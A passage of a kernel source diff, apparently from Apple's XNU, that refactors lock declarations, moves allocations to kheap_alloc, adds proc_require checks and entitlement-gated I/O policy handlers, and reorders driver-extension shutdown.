*/ - OSAddAtomic(1, &oid->oid_refcnt); + if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) { + OSAddAtomic(1, &oid->oid_refcnt); + } - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); #if CONFIG_MACF if (!from_kernel) { @@ -1637,7 +1792,7 @@ found: * may be into code whose reentrancy is protected by it. */ if (unlocked_node_found) { - lck_mtx_lock(sysctl_unlocked_node_lock); + lck_mtx_lock(&sysctl_unlocked_node_lock); } #if defined(HAS_APPLE_PAC) @@ -1660,7 +1815,7 @@ found: error = i; if (unlocked_node_found) { - lck_mtx_unlock(sysctl_unlocked_node_lock); + lck_mtx_unlock(&sysctl_unlocked_node_lock); } #if CONFIG_MACF @@ -1682,13 +1837,16 @@ dropref: * barrier to avoid waking every time through on "hot" * OIDs. */ - lck_rw_lock_shared(sysctl_geometry_lock); - if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) { - wakeup(&oid->oid_refcnt); + lck_rw_lock_shared(&sysctl_geometry_lock); + + if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) { + if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) { + wakeup(&oid->oid_refcnt); + } } err: - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -1767,7 +1925,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval) } } - MALLOC(namestring, char *, namestringlen, M_TEMP, M_WAITOK); + namestring = kheap_alloc(KHEAP_TEMP, namestringlen, Z_WAITOK); if (!namestring) { oldlen = 0; goto err; @@ -1775,7 +1933,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval) error = userland_sysctl(FALSE, namestring, namestringlen, name, uap->namelen, &req, &oldlen); - FREE(namestring, M_TEMP); + kheap_free(KHEAP_TEMP, namestring, namestringlen); if ((error) && (error != ENOMEM)) { return error; @@ -1813,14 +1971,14 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv } namelen = (size_t)uap->namelen; - MALLOC(name, char *, namelen + 1, M_TEMP, M_WAITOK); + name = kheap_alloc(KHEAP_TEMP, namelen + 1, Z_WAITOK); if (!name) { return ENOMEM; } 
error = copyin(uap->name, name, namelen); if (error) { - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); return error; } name[namelen] = '\0'; @@ -1830,7 +1988,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv */ if (uap->newlen > SIZE_T_MAX) { - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); return EINVAL; } newlen = (size_t)uap->newlen; @@ -1852,7 +2010,7 @@ sys_sysctlbyname(proc_t p, struct sysctlbyname_args *uap, __unused int32_t *retv error = userland_sysctl(TRUE, name, namelen + 1, oid, CTL_MAXNAME, &req, &oldlen); - FREE(name, M_TEMP); + kheap_free(KHEAP_TEMP, name, namelen + 1); if ((error) && (error != ENOMEM)) { return error; @@ -1946,3 +2104,44 @@ kernel_sysctlbyname(const char *name, void *oldp, size_t *oldlenp, void *newp, s } return error; } + +int +scalable_counter_sysctl_handler SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg2, oidp) + scalable_counter_t counter = *(scalable_counter_t*) arg1; + uint64_t value = counter_load(&counter); + return SYSCTL_OUT(req, &value, sizeof(value)); +} + +#define X(name, T) \ +int \ +experiment_factor_##name##_handler SYSCTL_HANDLER_ARGS \ +{ \ + int error, changed = 0; \ + T *ptr; \ + T new_value, current_value; \ + struct experiment_spec *spec = (struct experiment_spec *) arg1; \ + if (!arg1) { \ + return EINVAL; \ + } \ + ptr = (T *)(spec->ptr); \ + current_value = *ptr; \ + error = sysctl_io_number(req, current_value, sizeof(T), &new_value, &changed); \ + if (error != 0) { \ + return error; \ + } \ + if (changed) { \ + if (new_value < (T) spec->min_value || new_value > (T) spec->max_value) { \ + return EINVAL; \ + } \ + if (os_atomic_cmpxchg(&spec->modified, false, true, acq_rel)) { \ + spec->original_value = current_value; \ + } \ + os_atomic_store_wide(ptr, new_value, relaxed); \ + } \ + return 0; \ +} + +experiment_factor_numeric_types +#undef X diff --git a/bsd/kern/kern_ntptime.c b/bsd/kern/kern_ntptime.c index 0ae62258f..cbabd104b 100644 --- 
a/bsd/kern/kern_ntptime.c +++ b/bsd/kern/kern_ntptime.c @@ -187,20 +187,18 @@ static l_fp time_freq; static int64_t time_adjtime; static int updated; -static lck_spin_t * ntp_lock; -static lck_grp_t * ntp_lock_grp; -static lck_attr_t * ntp_lock_attr; -static lck_grp_attr_t *ntp_lock_grp_attr; +static LCK_GRP_DECLARE(ntp_lock_grp, "ntp_lock"); +static LCK_SPIN_DECLARE(ntp_lock, &ntp_lock_grp); #define NTP_LOCK(enable) \ enable = ml_set_interrupts_enabled(FALSE); \ - lck_spin_lock(ntp_lock); + lck_spin_lock(&ntp_lock); #define NTP_UNLOCK(enable) \ - lck_spin_unlock(ntp_lock);\ + lck_spin_unlock(&ntp_lock);\ ml_set_interrupts_enabled(enable); -#define NTP_ASSERT_LOCKED() LCK_SPIN_ASSERT(ntp_lock, LCK_ASSERT_OWNED) +#define NTP_ASSERT_LOCKED() LCK_SPIN_ASSERT(&ntp_lock, LCK_ASSERT_OWNED) static timer_call_data_t ntp_loop_update; static uint64_t ntp_loop_deadline; @@ -831,17 +829,5 @@ init_ntp_loop(void) void ntp_init(void) { - L_CLR(time_offset); - L_CLR(time_freq); - - ntp_lock_grp_attr = lck_grp_attr_alloc_init(); - ntp_lock_grp = lck_grp_alloc_init("ntp_lock", ntp_lock_grp_attr); - ntp_lock_attr = lck_attr_alloc_init(); - ntp_lock = lck_spin_alloc_init(ntp_lock_grp, ntp_lock_attr); - - updated = 0; - init_ntp_loop(); } - -SYSINIT(ntpclocks, SI_SUB_CLOCKS, SI_ORDER_MIDDLE, ntp_init, NULL); diff --git a/bsd/kern/kern_overrides.c b/bsd/kern/kern_overrides.c index 695d335b7..ca29c9079 100644 --- a/bsd/kern/kern_overrides.c +++ b/bsd/kern/kern_overrides.c @@ -51,10 +51,8 @@ #include /* Mutex for global system override state */ -static lck_mtx_t sys_override_lock; -static lck_grp_t *sys_override_mtx_grp; -static lck_attr_t *sys_override_mtx_attr; -static lck_grp_attr_t *sys_override_mtx_grp_attr; +static LCK_GRP_DECLARE(sys_override_mtx_grp, "system_override"); +static LCK_MTX_DECLARE(sys_override_lock, &sys_override_mtx_grp); /* * Assertion counts for system properties (add new ones for each new mechanism) @@ -87,9 +85,6 @@ static int64_t fast_jetsam_assert_cnt; /* Wait 
Channel for system override */ static uint64_t sys_override_wait; -/* Global variable to indicate if system_override is enabled */ -int sys_override_enabled; - /* Helper routines */ static void system_override_begin(uint64_t flags); static void system_override_end(uint64_t flags); @@ -97,17 +92,6 @@ static void system_override_abort(uint64_t flags); static void system_override_callouts(uint64_t flags, boolean_t enable_override); static __attribute__((noinline)) int PROCESS_OVERRIDING_SYSTEM_DEFAULTS(uint64_t timeout); -void -init_system_override() -{ - sys_override_mtx_grp_attr = lck_grp_attr_alloc_init(); - sys_override_mtx_grp = lck_grp_alloc_init("system_override", sys_override_mtx_grp_attr); - sys_override_mtx_attr = lck_attr_alloc_init(); - lck_mtx_init(&sys_override_lock, sys_override_mtx_grp, sys_override_mtx_attr); - io_throttle_assert_cnt = cpu_throttle_assert_cnt = fast_jetsam_assert_cnt = 0; - sys_override_enabled = 1; -} - /* system call implementation */ int system_override(__unused struct proc *p, struct system_override_args * uap, __unused int32_t *retval) @@ -127,12 +111,6 @@ system_override(__unused struct proc *p, struct system_override_args * uap, __un goto out; } - /* Make sure that the system override syscall has been initialized */ - if (!sys_override_enabled) { - error = EINVAL; - goto out; - } - lck_mtx_lock(&sys_override_lock); if (flags & SYS_OVERRIDE_DISABLE) { diff --git a/bsd/kern/kern_persona.c b/bsd/kern/kern_persona.c index b3470216a..31561cf42 100644 --- a/bsd/kern/kern_persona.c +++ b/bsd/kern/kern_persona.c @@ -998,8 +998,7 @@ persona_proc_adopt(proc_t p, struct persona *persona, kauth_cred_t auth_override /* Only Multiuser Mode needs to update the session login name to the persona name */ #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - volatile uint32_t *multiuser_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG); - uint32_t multiuser_flags = *multiuser_flag_address; + uint32_t multiuser_flags = 
COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG); /* set the login name of the session */ if (multiuser_flags) { struct session * sessp = proc_session(p); diff --git a/bsd/kern/kern_proc.c b/bsd/kern/kern_proc.c index 21fa06635..163122f54 100644 --- a/bsd/kern/kern_proc.c +++ b/bsd/kern/kern_proc.c @@ -190,10 +190,17 @@ __XNU_PRIVATE_EXTERN char corefilename[MAXPATHLEN + 1] = {"/private/var/cores/%N #include #endif +static LCK_MTX_DECLARE_ATTR(proc_klist_mlock, &proc_mlock_grp, &proc_lck_attr); + ZONE_DECLARE(pgrp_zone, "pgrp", sizeof(struct pgrp), ZC_ZFREE_CLEARMEM); ZONE_DECLARE(session_zone, "session", sizeof(struct session), ZC_ZFREE_CLEARMEM); +/* + * If you need accounting for KM_PROC consider using + * ZONE_VIEW_DEFINE to define a zone view. + */ +#define KM_PROC KHEAP_DEFAULT typedef uint64_t unaligned_u64 __attribute__((aligned(1))); @@ -282,7 +289,7 @@ again: LIST_REMOVE(uip, ui_hash); retval = 0; proc_list_unlock(); - FREE(uip, M_PROC); + kheap_free(KM_PROC, uip, sizeof(struct uidinfo)); goto out; } if (diff <= 0) { @@ -304,15 +311,13 @@ again: goto out; } proc_list_unlock(); - MALLOC(newuip, struct uidinfo *, sizeof(*uip), M_PROC, M_WAITOK); + newuip = kheap_alloc(KM_PROC, sizeof(struct uidinfo), Z_WAITOK); if (newuip == NULL) { panic("chgproccnt: M_PROC zone depleted"); } goto again; out: - if (newuip != NULL) { - FREE(newuip, M_PROC); - } + kheap_free(KM_PROC, newuip, sizeof(struct uidinfo)); return retval; } @@ -596,7 +601,7 @@ retry: (((p->p_listflag & (P_LIST_DRAIN | P_LIST_DRAINWAIT)) == 0) || ((p->p_listflag & P_LIST_REFWAIT) != 0))) { if ((p->p_listflag & P_LIST_REFWAIT) != 0 && uthread_needs_to_wait_in_proc_refwait()) { - msleep(&p->p_listflag, proc_list_mlock, 0, "proc_refwait", 0); + msleep(&p->p_listflag, &proc_list_mlock, 0, "proc_refwait", 0); /* * the proc might have been recycled since we dropped * the proc list lock, get the proc again. 
@@ -648,7 +653,7 @@ again: /* If someone else is controlling the (unreaped) zombie - wait */ if ((p->p_listflag & P_LIST_WAITING) != 0) { - (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); goto again; } p->p_listflag |= P_LIST_WAITING; @@ -699,7 +704,7 @@ proc_refdrain_with_refwait(proc_t p, boolean_t get_ref_and_allow_wait) /* Do not wait in ref drain for launchd exec */ while (p->p_refcount && !initexec) { p->p_listflag |= P_LIST_DRAINWAIT; - msleep(&p->p_refcount, proc_list_mlock, 0, "proc_refdrain", 0); + msleep(&p->p_refcount, &proc_list_mlock, 0, "proc_refdrain", 0); } p->p_listflag &= ~P_LIST_DRAIN; @@ -746,7 +751,7 @@ loop: if ((pp->p_listflag & (P_LIST_CHILDDRSTART | P_LIST_CHILDDRAINED)) == P_LIST_CHILDDRSTART) { pp->p_listflag |= P_LIST_CHILDDRWAIT; - msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0); + msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0); loopcnt++; if (loopcnt == 5) { parent = PROC_NULL; @@ -800,7 +805,7 @@ proc_childdrainstart(proc_t p) /* wait for all that hold parentrefs to drop */ while (p->p_parentref > 0) { p->p_listflag |= P_LIST_PARENTREFWAIT; - msleep(&p->p_parentref, proc_list_mlock, 0, "proc_childdrainstart", 0); + msleep(&p->p_parentref, &proc_list_mlock, 0, "proc_childdrainstart", 0); } } @@ -857,6 +862,7 @@ int proc_pid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_pid; } return -1; @@ -866,6 +872,7 @@ int proc_ppid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_ppid; } return -1; @@ -875,6 +882,7 @@ int proc_original_ppid(proc_t p) { if (p != NULL) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); return p->p_original_ppid; } return -1; @@ -913,6 +921,7 @@ int proc_csflags(proc_t p, uint64_t *flags) { if (p && flags) { + proc_require(p, PROC_REQUIRE_ALLOW_KERNPROC); *flags = (uint64_t)p->p_csflags; return 0; } @@ -996,7 +1005,7 
@@ loop: parent = proc_ref_locked(pp); if ((parent == PROC_NULL) && (pp != PROC_NULL) && (pp->p_stat != SZOMB) && ((pp->p_listflag & P_LIST_EXITED) != 0) && ((pp->p_listflag & P_LIST_CHILDDRAINED) == 0)) { pp->p_listflag |= P_LIST_CHILDLKWAIT; - msleep(&pp->p_childrencnt, proc_list_mlock, 0, "proc_parent", 0); + msleep(&pp->p_childrencnt, &proc_list_mlock, 0, "proc_parent", 0); goto loop; } proc_list_unlock(); @@ -1745,7 +1754,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess) sess->s_count = 1; sess->s_ttypgrpid = NO_PID; - lck_mtx_init(&sess->s_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&sess->s_mlock, &proc_mlock_grp, &proc_lck_attr); bcopy(procsp->s_login, sess->s_login, sizeof(sess->s_login)); @@ -1773,7 +1782,7 @@ enterpgrp(proc_t p, pid_t pgid, int mksess) } pgrp->pg_id = pgid; - lck_mtx_init(&pgrp->pg_mlock, proc_mlock_grp, proc_lck_attr); + lck_mtx_init(&pgrp->pg_mlock, &proc_mlock_grp, &proc_lck_attr); LIST_INIT(&pgrp->pg_members); proc_list_lock(); @@ -1897,13 +1906,13 @@ pgdelete_dropref(struct pgrp *pgrp) panic("pg_deleteref: freeing session in use"); } proc_list_unlock(); - lck_mtx_destroy(&sessp->s_mlock, proc_mlock_grp); + lck_mtx_destroy(&sessp->s_mlock, &proc_mlock_grp); zfree(session_zone, sessp); } else { proc_list_unlock(); } - lck_mtx_destroy(&pgrp->pg_mlock, proc_mlock_grp); + lck_mtx_destroy(&pgrp->pg_mlock, &proc_mlock_grp); zfree(pgrp_zone, pgrp); } @@ -2232,6 +2241,18 @@ proc_ignores_content_protection(proc_t p) return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_CONTENT_PROTECTION; } +bool +proc_ignores_node_permissions(proc_t p) +{ + return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS; +} + +bool +proc_skip_mtime_update(proc_t p) +{ + return os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE; +} + #if CONFIG_COREDUMP /* * proc_core_name(name, uid, pid) @@ -2764,7 +2785,7 @@ proc_iterate( proc_list_lock(); pid_count_available = nprocs + 1; 
/* kernel_task not counted in nprocs */ assert(pid_count_available > 0); - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } proc_list_unlock(); @@ -2927,7 +2948,7 @@ proc_childrenwalk( proc_list_unlock(); goto out; } - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } proc_list_unlock(); @@ -3008,7 +3029,7 @@ pgrp_iterate( } goto out; } - if (pidlist_nalloc(pl) > pid_count_available) { + if (pidlist_nalloc(pl) >= pid_count_available) { break; } pgrp_unlock(pgrp); @@ -3166,7 +3187,7 @@ pgrp_replace(struct proc * p, struct pgrp * newpg) while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } p->p_listflag |= P_LIST_PGRPTRANS; @@ -3276,7 +3297,7 @@ proc_pgrp(proc_t p) while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } pgrp = p->p_pgrp; @@ -3328,7 +3349,7 @@ proc_session(proc_t p) /* wait during transitions */ while ((p->p_listflag & P_LIST_PGRPTRANS) == P_LIST_PGRPTRANS) { p->p_listflag |= P_LIST_PGRPTRWAIT; - (void)msleep(&p->p_pgrpid, proc_list_mlock, 0, "proc_pgrp", 0); + (void)msleep(&p->p_pgrpid, &proc_list_mlock, 0, "proc_pgrp", 0); } if ((p->p_pgrp != PGRP_NULL) && ((sess = p->p_pgrp->pg_session) != SESSION_NULL)) { @@ -3356,7 +3377,7 @@ session_rele(struct session *sess) panic("session_rele: freeing session in use"); } proc_list_unlock(); - lck_mtx_destroy(&sess->s_mlock, proc_mlock_grp); + lck_mtx_destroy(&sess->s_mlock, &proc_mlock_grp); zfree(session_zone, sess); } else { proc_list_unlock(); @@ -3451,13 +3472,13 @@ proc_transwait(proc_t p, int locked) void proc_klist_lock(void) { - 
lck_mtx_lock(proc_klist_mlock); + lck_mtx_lock(&proc_klist_mlock); } void proc_klist_unlock(void) { - lck_mtx_unlock(proc_klist_mlock); + lck_mtx_unlock(&proc_klist_mlock); } void diff --git a/bsd/kern/kern_prot.c b/bsd/kern/kern_prot.c index d689b70d5..6a0b8edee 100644 --- a/bsd/kern/kern_prot.c +++ b/bsd/kern/kern_prot.c @@ -119,14 +119,10 @@ * result. * * Note: Does *NOT* currently include per-thread credential changes - * - * We don't use kauth_cred_print() in current debugging, but it - * can be used if needed when debugging is active. */ #if DEBUG_CRED #define DEBUG_CRED_ENTER printf #define DEBUG_CRED_CHANGE printf -extern void kauth_cred_print(kauth_cred_t cred); #else /* !DEBUG_CRED */ #define DEBUG_CRED_ENTER(fmt, ...) do {} while (0) #define DEBUG_CRED_CHANGE(fmt, ...) do {} while (0) diff --git a/bsd/kern/kern_resource.c b/bsd/kern/kern_resource.c index 662846584..65c6d020c 100644 --- a/bsd/kern/kern_resource.c +++ b/bsd/kern/kern_resource.c @@ -1614,6 +1614,10 @@ static int iopolicysys_vfs_trigger_resolve(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); static int iopolicysys_vfs_ignore_content_protection(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); +static int +iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *ipo_param); +static int +iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, int policy, struct _iopol_param_t *iop_param); /* * iopolicysys @@ -1684,6 +1688,18 @@ iopolicysys(struct proc *p, struct iopolicysys_args *uap, int32_t *retval) goto out; } break; + case IOPOL_TYPE_VFS_IGNORE_PERMISSIONS: + error = iopolicysys_vfs_ignore_node_permissions(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, &iop_param); + if (error) { + goto out; + } + break; + case IOPOL_TYPE_VFS_SKIP_MTIME_UPDATE: + error = iopolicysys_vfs_skip_mtime_update(p, uap->cmd, iop_param.iop_scope, iop_param.iop_policy, 
&iop_param); + if (error) { + goto out; + } + break; default: error = EINVAL; goto out; @@ -2289,6 +2305,104 @@ out: return error; } +#define AUTHORIZED_ACCESS_ENTITLEMENT \ + "com.apple.private.vfs.authorized-access" +int +iopolicysys_vfs_ignore_node_permissions(struct proc *p, int cmd, int scope, + int policy, __unused struct _iopol_param_t *iop_param) +{ + int error = EINVAL; + + switch (scope) { + case IOPOL_SCOPE_PROCESS: + break; + default: + goto out; + } + + switch (cmd) { + case IOPOL_CMD_GET: + policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS ? + IOPOL_VFS_IGNORE_PERMISSIONS_ON : IOPOL_VFS_IGNORE_PERMISSIONS_OFF; + iop_param->iop_policy = policy; + goto out_ok; + case IOPOL_CMD_SET: + /* SET is handled after the switch */ + break; + default: + goto out; + } + + if (!IOTaskHasEntitlement(current_task(), AUTHORIZED_ACCESS_ENTITLEMENT)) { + error = EPERM; + goto out; + } + + switch (policy) { + case IOPOL_VFS_IGNORE_PERMISSIONS_OFF: + os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed); + break; + case IOPOL_VFS_IGNORE_PERMISSIONS_ON: + os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_IGNORE_NODE_PERMISSIONS, relaxed); + break; + default: + break; + } + +out_ok: + error = 0; +out: + return error; +} + +#define SKIP_MTIME_UPDATE_ENTITLEMENT \ + "com.apple.private.vfs.skip-mtime-updates" +int +iopolicysys_vfs_skip_mtime_update(struct proc *p, int cmd, int scope, + int policy, __unused struct _iopol_param_t *iop_param) +{ + int error = EINVAL; + + switch (scope) { + case IOPOL_SCOPE_PROCESS: + break; + default: + goto out; + } + + switch (cmd) { + case IOPOL_CMD_GET: + policy = os_atomic_load(&p->p_vfs_iopolicy, relaxed) & P_VFS_IOPOLICY_SKIP_MTIME_UPDATE ? 
+ IOPOL_VFS_SKIP_MTIME_UPDATE_ON : IOPOL_VFS_SKIP_MTIME_UPDATE_OFF; + iop_param->iop_policy = policy; + goto out_ok; + case IOPOL_CMD_SET: + break; + default: /* unrecognized cmd: bail out with error still EINVAL, matching iopolicysys_vfs_ignore_node_permissions */ + goto out; + } + + if (!IOTaskHasEntitlement(current_task(), SKIP_MTIME_UPDATE_ENTITLEMENT)) { + error = EPERM; + goto out; + } + + switch (policy) { + case IOPOL_VFS_SKIP_MTIME_UPDATE_OFF: + os_atomic_andnot(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed); + break; + case IOPOL_VFS_SKIP_MTIME_UPDATE_ON: + os_atomic_or(&p->p_vfs_iopolicy, P_VFS_IOPOLICY_SKIP_MTIME_UPDATE, relaxed); + break; + default: + break; + } + +out_ok: + error = 0; +out: + return error; +} /* BSD call back function for task_policy networking changes */ void proc_apply_task_networkbg(void * bsd_info, thread_t thread) diff --git a/bsd/kern/kern_shutdown.c b/bsd/kern/kern_shutdown.c index 3bd774db5..e723f89a2 100644 --- a/bsd/kern/kern_shutdown.c +++ b/bsd/kern/kern_shutdown.c @@ -67,6 +67,7 @@ #include /* for delay_for_interval() */ #include #include +#include #include @@ -82,7 +83,7 @@ unsigned int proc_shutdown_exitcount = 0; static int sd_openlog(vfs_context_t); static int sd_closelog(vfs_context_t); static void sd_log(vfs_context_t, const char *, ...); -static void proc_shutdown(void); +static void proc_shutdown(int only_non_dext); static void zprint_panic_info(void); extern void halt_log_enter(const char * what, const void * pc, uint64_t time); @@ -93,6 +94,7 @@ extern boolean_t kdp_has_polled_corefile(void); struct sd_filterargs { int delayterm; int shutdownstate; + int only_non_dext; }; @@ -113,7 +115,7 @@ static int sd_callback1(proc_t p, void * arg); static int sd_callback2(proc_t p, void * arg); static int sd_callback3(proc_t p, void * arg); -extern boolean_t panic_include_zprint; +extern bool panic_include_zprint; extern mach_memory_info_t *panic_kext_memory_info; extern vm_size_t panic_kext_memory_size; @@ -217,7 +219,7 @@ reboot_kernel(int howto, char *message) /* handle live procs (deallocate their root and 
current directories), suspend initproc */ startTime = mach_absolute_time(); - proc_shutdown(); + proc_shutdown(TRUE); halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime); #if CONFIG_AUDIT @@ -252,10 +254,27 @@ reboot_kernel(int howto, char *message) #endif /* DEVELOPMENT || DEBUG */ { startTime = mach_absolute_time(); - vfs_unmountall(); + vfs_unmountall(TRUE); halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime); } + IOSystemShutdownNotification(kIOSystemShutdownNotificationTerminateDEXTs); + + startTime = mach_absolute_time(); + proc_shutdown(FALSE); + halt_log_enter("proc_shutdown", 0, mach_absolute_time() - startTime); + +#if DEVELOPMENT || DEBUG + if (!(howto & RB_PANIC) || !kdp_has_polled_corefile()) +#endif /* DEVELOPMENT || DEBUG */ + { + startTime = mach_absolute_time(); + vfs_unmountall(FALSE); + halt_log_enter("vfs_unmountall", 0, mach_absolute_time() - startTime); + } + + + /* Wait for the buffer cache to clean remaining dirty buffers */ startTime = mach_absolute_time(); for (iter = 0; iter < 100; iter++) { @@ -334,6 +353,7 @@ sd_closelog(vfs_context_t ctx) if (sd_logvp != NULLVP) { VNOP_FSYNC(sd_logvp, MNT_WAIT, ctx); error = vnode_close(sd_logvp, FWRITE, ctx); + sd_logvp = NULLVP; } return error; @@ -365,6 +385,8 @@ sd_log(vfs_context_t ctx, const char *fmt, ...) 
va_end(arglist); } +#define proc_is_driver(p) (task_is_driver((p)->task)) + static int sd_filt1(proc_t p, void * args) { @@ -373,6 +395,10 @@ sd_filt1(proc_t p, void * args) int delayterm = sf->delayterm; int shutdownstate = sf->shutdownstate; + if (sf->only_non_dext && proc_is_driver(p)) { + return 0; + } + if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0) || (p == self) || (p->p_stat == SZOMB) || (p->p_shutdownstate != shutdownstate) @@ -403,7 +429,9 @@ sd_callback1(proc_t p, void * args) proc_shutdown_exitcount++; proc_list_unlock(); } - + if (proc_is_driver(p)) { + printf("lingering dext %s signal(%d)\n", p->p_name, signo); + } psignal(p, signo); if (countproc != 0) { sd->activecount++; @@ -423,6 +451,10 @@ sd_filt2(proc_t p, void * args) int delayterm = sf->delayterm; int shutdownstate = sf->shutdownstate; + if (sf->only_non_dext && proc_is_driver(p)) { + return 0; + } + if (((p->p_flag & P_SYSTEM) != 0) || (p->p_ppid == 0) || (p == self) || (p->p_stat == SZOMB) || (p->p_shutdownstate == shutdownstate) @@ -451,6 +483,9 @@ sd_callback2(proc_t p, void * args) proc_shutdown_exitcount++; proc_list_unlock(); } + if (proc_is_driver(p)) { + printf("lingering dext %s signal(%d)\n", p->p_name, signo); + } psignal(p, signo); if (countproc != 0) { sd->activecount++; @@ -517,7 +552,7 @@ sd_callback3(proc_t p, void * args) */ static void -proc_shutdown(void) +proc_shutdown(int only_non_dext) { vfs_context_t ctx = vfs_context_current(); struct proc *p, *self; @@ -550,6 +585,7 @@ sigterm_loop: */ sfargs.delayterm = delayterm; sfargs.shutdownstate = 0; + sfargs.only_non_dext = only_non_dext; sdargs.signo = SIGTERM; sdargs.setsdstate = 1; sdargs.countproc = 1; @@ -569,7 +605,7 @@ sigterm_loop: */ ts.tv_sec = 3; ts.tv_nsec = 0; - error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts); + error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts); if (error != 0) { for (p = allproc.lh_first; p; p = p->p_list.le_next) 
{ if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) { @@ -628,7 +664,7 @@ sigterm_loop: */ ts.tv_sec = 10; ts.tv_nsec = 0; - error = msleep(&proc_shutdown_exitcount, proc_list_mlock, PWAIT, "shutdownwait", &ts); + error = msleep(&proc_shutdown_exitcount, &proc_list_mlock, PWAIT, "shutdownwait", &ts); if (error != 0) { for (p = allproc.lh_first; p; p = p->p_list.le_next) { if ((p->p_listflag & P_LIST_EXITCOUNT) == P_LIST_EXITCOUNT) { @@ -686,6 +722,10 @@ sigterm_loop: sd_closelog(ctx); + if (only_non_dext) { + return; + } + /* * Now that all other processes have been terminated, suspend init */ diff --git a/bsd/kern/kern_sig.c b/bsd/kern/kern_sig.c index 3c9cb1fee..74ecaf338 100644 --- a/bsd/kern/kern_sig.c +++ b/bsd/kern/kern_sig.c @@ -3252,7 +3252,6 @@ postsig_locked(int signum) * Default catcher, where the default is to kill * the process. (Other cases were ignored above.) */ - sig_lock_to_exit(p); /* * exit_with_reason() below will consume a reference to the thread's exit reason, so we take another diff --git a/bsd/kern/kern_sysctl.c b/bsd/kern/kern_sysctl.c index 4c07b8ce9..153407899 100644 --- a/bsd/kern/kern_sysctl.c +++ b/bsd/kern/kern_sysctl.c @@ -105,6 +105,7 @@ #include #include #include +#include #include #include @@ -189,6 +190,7 @@ extern unsigned int speculative_prefetch_max_iosize; extern unsigned int preheat_max_bytes; extern unsigned int preheat_min_bytes; extern long numvnodes; +extern long freevnodes; extern long num_recycledvnodes; extern uuid_string_t bootsessionuuid_string; @@ -449,6 +451,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus host_basic_info_data_t hinfo; kern_return_t kret; uint32_t size; + uint32_t buf_size = 0; int changed; mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; struct _processor_statistics_np *buf; @@ -465,7 +468,8 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus return EINVAL; } - MALLOC(buf, struct _processor_statistics_np*, size, 
